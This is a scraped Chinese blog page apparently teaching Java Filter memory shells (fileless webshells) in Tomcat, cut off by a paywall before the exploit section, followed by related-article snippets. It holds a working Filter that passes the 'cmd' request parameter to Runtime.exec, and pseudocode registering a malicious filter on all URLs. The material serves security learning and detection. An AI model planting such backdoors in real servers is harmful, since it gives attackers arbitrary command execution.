java Filter内存马分析

最新推荐文章于 2025-03-08 00:16:25 发布
最新推荐文章于 2025-03-08 00:16:25 发布
阅读量934 收藏 19
点赞数 21
CC 4.0 BY-SA版权
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hackzkaq/article/details/135123866
本文探讨了Java Web中的Filter内存马,介绍了其概念、环境搭建、Filter内存马的探索,包括Tomcat Filter的执行流程和攻击思路分析。通过分析,展示了如何动态注册Filter马并编写exp,强调了其在攻防中的隐蔽性和危害性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

0x01 什么是Filter马

0x02 环境搭建

0x03 Filter内存马探索

1.tomcat Filter 的流程分析

2.攻击思路分析

0x04 Filter内存马exp编写

本文由掌控安全学院 - xilitter 投稿

知识基础:

刚开始内存马的这块学习与反序列化并无太大关系,反而与javaweb,tomcat联系更加紧密。所以在学习内存马之前需要先了解JSP,java web的三大件,Servlet,Filter,Listener的基本知识和工作流程和Tomcat 架构的相关内容。

0x01 什么是Filter马

内存马就是无文件木马,无文件落地,它通常会存在进程,内存或者java虚拟机中,特点更加隐蔽,难以排查,并且也难以删除。而今天学习的Filter内存马是传统web应用型内存马,主要将恶意代码注入到过滤器中,当过滤器拦截servlet请求的参数时,过滤器中的恶意代码就会执行。

0x02 环境搭建

首先配置一个 servlet 的web项目,
 

图片


然后一直点下一步就好了,它会自动帮我们生成一个简单的servlet
pom.xml中导入tomcat相关依赖

<dependency>
            <groupId>org.apache.tomcat</groupId>
            <artifactId>tomcat-catalina</artifactId>
            <version>9.0.38</version>
            <scope>provided</scope>
        </dependency>
        <dependency>
            <groupId>org.apache.tomcat</groupId>
            <artifactId>tomcat-websocket</artifactId>
            <version>9.0.38</version>
        </dependency>

方便之后调试代码,在这之后我们创建一个自定义的Filter过滤器

package com.example.memoryhorse;
import javax.servlet.*;
import java.io.IOException;

public class MyFilter implements Filter{
    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        System.out.println("执行过滤功能");
        servletRequest.setCharacterEncoding("utf-8");
        servletResponse.setCharacterEncoding("utf-8");
        servletResponse.setContentType("text/html;charset=UTF-8");
        filterChain.doFilter(servletRequest,servletResponse);
        System.out.println(servletRequest.getParameter("cmd"));
        Runtime.getRuntime().exec(servletRequest.getParameter("cmd"));
    }
}

重写了doFilter方法,里面添加恶意代码,接收cmd参数,执行任意命令。web.xml中配置相关参数

<filter>
    <filter-name>MyFilter</filter-name>
    <filter-class>com.example.memoryhorse.MyFilter</filter-class>
</filter>
<filter-mapping>
    <filter-name>MyFilter</filter-name>
    <url-pattern>/MyFilter</url-pattern>
</filter-mapping>

这里我定义的是/MyFilter路由,在访问这个路由时,就会被我们自定义的过滤器拦截

0x03 Filter内存马探索

这个时候是不是就有点像内存马的样子,我们注册了一个恶意的 /MyFilter 路由,访问这个路由可以执行任意代码。测试一下
 

最低0.47元/天 解锁文章

200万优质内容无限畅学
zkzq
关注
内存基础知识 Java
CodeShiftZ的博客
09-07 492
Java中有三种类加载器:引导类加载器(Bootstrap Class Loader)、扩展类加载器(Extension Class Loader)和应用程序类加载器(Application Class Loader)。内存(Memory Shellcode)是一种恶意代码注入技术,它利用软件漏洞或者其他方式将恶意代码加载到受感染的进程内存中,并在执行过程中劫持程序的控制流。在Java中,我们可以自定义类加载器,通过继承ClassLoader类并实现自己的加载逻辑来加载类。内存基础知识 Java
Java Tomcat内存——filter内存
m0_61506558的博客
11-17 774
至此,invoke()部分的所有流程我们都分析完毕了,接着继续往上看,也就是doFilter()方法。这个doFilter()方法也是由最近的那个invoke()方法调用的。如图,我们把断点下过去。如果师傅们这个invoke()方法可用的话,可以断点下这里,如果不可用的话可以下到后面doFilter()方法。这里我们要重点关注前文说过的这个变量,那它是什么呢?我们跟进这个方法。使用创建了一个过滤链,将进行传递。我们在方法走一下流程。
学习Java agent 内存(看不懂别关闭,直接喷!!!)
一剑开天门!的博客
12-23 3642
java agent 是 Java 程序,可以通过在 Java 虚拟机(JVM)启动时提供参数来加载和运行。它可以通过 java.lang.instrument 包提供的 Java 标准接口进行代码插桩,从而在 Java 应用程序的类加载和运行期间改变 Java 字节码。而java agent内存就是利用这个特性产生。
浅析JavaWeb内存基础原理与查杀思路
道阻且长,行则将至
04-04 6595
传统的 Webshell 后门很容易被当前 WAF、HIDS、EDR 等安全设备检测出来,于是无文件落地的内存技术得以诞生并快速发展。本文简要分析Java内存的原理、分类,并实践了主流Webshell客户端管理工具内存的使用与当前应对内存的一些查杀思路、手段。
Java内存简单实现
派大星的博客
12-04 2721
Java内存
Java内存基础
m0_46317063的博客
02-05 457
filter内存基础
Java服务安全内存实践资料合集(33份).zip
01-14
Java服务安全内存实践资料合集,共33份,供大家学习参阅。 Python 内存分析.pdf ...java Filter内存分析.pdf Java内存:一种Tomcat全版本获取StandardContext的新方法.pdf java内存.pdf ……等等33份。
java内存分析集合
hongduilanjun的博客
04-04 6416
基于tomcat Servlet内存 web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
Java Tomcat内存——Servlet内存
m0_61506558的博客
11-27 672
Java Servlet 是运行在 Web 服务器或应用服务器上的程序,它是作为来自 Web 浏览器或其他 HTTP 客户端的请求和 HTTP 服务器上的数据库或应用程序之间的中间层。使用 Servlet,您可以收集来自网页表单的用户输入,呈现来自数据库或者其他源的记录,还可以动态创建网页。Java Servlet 通常情况下与使用 CGI(Common Gateway Interface,公共网关接口)实现的程序可以达到异曲同工的效果
一文深度学习java内存
jxiang213的博客
10-25 1342
java内存注入一般分为两种动态注册添加新的listener/filter/servlet/controller等等agent注入修改已有class,插入恶意代码在理解内存注入前,有几个概念需要掌握的。类加载双亲委派问题以及context类反射。
Java内存 原理、实战与查杀】
weixin_46318447的博客
06-11 3155
内存原理 、实战与查杀
java内存
google20的博客
12-25 1479
filter,servlet,listener,valve,spring内存
Java内存攻防实战——攻击基础篇
JavaMonsterr的博客
05-23 3567
在红蓝对抗中,攻击方广泛应用webshell等技术在防守方提供的服务中植入后门,防守方也发展出各种技术来应对攻击,传统的落地型webshell很容易被攻击方检测和绞杀。而内存技术则是通过在运行的服务中直接插入运行攻击者的webshell逻辑,利用中间件的进程执行某些恶意代码,而不依赖实体文件的存在实现的服务后门,因此具有更好的隐蔽性,也更容易躲避传统安全监测设备的检测。 本文以Java语言为基础讨论内存技术的攻防,分为两个篇章,分别是攻击基础篇和防护应用篇。本篇攻击基础篇介绍了Java Servlet
JAVA安全—手搓内存
2301_76227305的博客
03-01 1657
首先什么是内存呢,顾名思义就是把木打进内存中。传统的webshell一旦把文件删除就断开连接了,而Java内存则不同,它将恶意代码直接加载到内存中运行。因为代码是直接在内存中执行的,它不需要保存到硬盘上,这使得它很难被传统的杀毒软件发现和检测。至此结束。
[Java安全]—Controller内存
Sentiment的博客
11-02 686
Controller内存
【Web】小白友好的Java内存基础学习笔记
uuzeray的博客
02-10 1726
内存(Memory Shellcode)是一种恶意攻击技术,旨在通过利用程序或操作系统的漏洞,将恶意代码注入到系统内存中并执行。与传统的攻击方式不同,内存不需要将恶意代码写入磁盘上的文件,而是直接在内存中进行操作,从而避开传统的安全防护措施。内存的危害性在于它可以绕过许多传统的安全防护机制,例如防病毒软件和防火墙,因为恶意代码不会留下明显的痕迹或文件。此外,由于直接在内存中执行,内存攻击也更难以被检测和追踪。
小谈java内存
最新发布
shihui的博客
03-08 1006
省流版Servlet 内存:通过动态注册恶意 Servlet 并绑定 URL 路由,当访问特定路径时触发恶意逻辑。Filter 内存:通过动态注册恶意 Filter 并配置路由,拦截请求时触发恶意逻辑。Listener 内存:通过动态注册恶意 Listener,当特定事件发生时(如应用启动、会话创建)触发恶意逻辑。
红队视角下Java内存的应用
include_voidmain的博客
11-07 873
红队视角下Java内存的应用
Java内存使用
mudi13的博客
09-05 1445
对于终端安全:有文件监控、防篡改、EDR;对于后门:有 Webshell 查杀、流量监测;对于网络层面:有防火墙防止反连、反向代理系统隐藏真实 IP;等等。​ 目前主流的防御措施针对 Webshell 的静态检出率在 90% 以上,在部分环境下甚至完全无法落地,防御方可以做到快速应急响应。正因为这些限制,内存技术得以诞生并快速发展,无文件攻击、内存 Webshell、进程注入等基于内存的攻击手段也受到了越来越多的师傅青睐,在实战环境中已占得一席之地。
servlet内存
01-08
### Servlet 内存实现 内存是一种高级的Web攻击技术,在不留下持久化痕迹的情况下,通过向Java Web应用容器(如Tomcat)中的Servlet组件注入恶意代码来获取对服务器的控制权。对于基于Servlet API的内存而言,其核心在于动态创建并注册恶意的`Servlet`, `Filter` 或者 `Listener`实例。 #### 动态创建与注册过程 为了使恶意逻辑能够在每次HTTP请求到来时被执行,需要满足两个主要条件: - **动态创建对象**:使用反射机制或其他方式即时生成新的类定义,并将其加载至JVM中运行。 - **注册到HTTP处理流程**:确保新创建的对象可以参与到正常的HTTP请求响应链路里去[^3]。 例如,可以通过修改现有的ClassLoaders行为或者利用某些框架特性绕过标准的应用部署流程完成上述操作。 ```java // 创建一个匿名内部类作为恶意过滤器 Filter maliciousFilter = new Filter() { @Override public void init(FilterConfig filterConfig) throws ServletException {} @Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { // 执行恶意命令... chain.doFilter(request,response); } @Override public void destroy() {} }; // 将这个filter添加到当前上下文中 ServletContext context = ...; context.addFilter("malicious", maliciousFilter).addMappingForUrlPatterns(null ,true,"/*"); ``` 这段伪代码展示了如何在一个已有的应用程序内植入一个新的过滤器实例,从而影响所有的URL路径访问。 ### 检测与防护措施 由于内存不会在磁盘上留下任何物理文件,传统依赖于静态扫描的方法难以发现这类威胁。因此,有效的检测策略应该集中在以下几个方面: - **异常行为监控**:关注那些不符合常规模式的行为特征,比如突然增加的新线程、未预期的服务端口开放或是频繁的数据传输活动等[^4]。 - **日志审计**:仔细审查服务启动期间的日志记录,特别是有关类加载事件的信息;同时也要留意是否存在可疑的API调用序列。 - **内存镜像分析**:定期抓取正在运行进程的工作集副本进行离线检查,寻找隐藏其中的潜在风险点。 至于预防性的保护举措,则建议采取如下几项行动: - 加强权限管理,限制不必要的功能暴露给外部网络; - 应用最新的补丁更新以修复可能存在的漏洞; - 部署专门的安全产品,如入侵检测系统(IDS),它们往往具备更敏锐感知能力用于识别未知类型的攻击尝试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值